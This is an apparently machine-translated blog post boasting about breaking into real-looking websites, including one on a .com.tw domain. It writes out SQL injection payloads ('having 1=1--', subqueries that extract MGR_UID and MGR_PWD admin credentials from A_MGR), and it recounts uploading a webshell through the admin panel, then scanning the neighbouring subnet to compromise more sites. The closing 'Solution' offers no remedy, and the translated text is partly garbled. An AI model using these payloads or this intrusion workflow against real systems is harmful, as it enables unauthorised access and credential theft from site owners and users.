An injection point is found. http://www.bkjia.com /Diary_A.asp? UBID = & DCID = dc2012050610558247 & DIID = DI2012050610583389 habitually add 'having1 = 1 -- http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389 'Having 1 = 1-Diary_A.dl_Title (very excited at this time) http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389 'Group by dl_Title having 1 = 1-continue, several fields and table segments are exploding, but the required user management fields are not found. What should I do? Go to the background login page and check the source code Input name = "ADUID" Input name = "ADPWD "We are lucky to find the field, so we will continue to find it and start to blow the user. http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389 'And (select top 1 MGR_UID from A_MGR)> 0-Password explosion http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389 'And (select top 1 MGR_PWD from A_MGR)> 0-the injection point is tested. The problem is that the table where the article is to be injected has a headache. However, since the table where the article is reported can only go to the background, but the background characters are limited, you can think of where the user can log on. let's try it. Today, I am very lucky to have a burst. I found several uploading points in the background that cannot be uploaded in some places, and there is no way to prevent malicious code. Baidu found a horse that seemed to be able to break through. upload the file directly in system management, but there is no display address. Upload the file again and capture the package. OK.
I cannot go to bed at night... When I got up the next day, I had nothing to do. Continue to the Japanese site. Find a station and scan c next to the station. I found that there was also a shopping station in section c, then, similar to the template of this station, find the member logon port to test and (select top 1 MGR_UID from A_MGR)> 0-I was so excited that I was able to kill the game again, turning the c-section, turning it out, and winning the game for several other sites.Solution:
They are more professional than me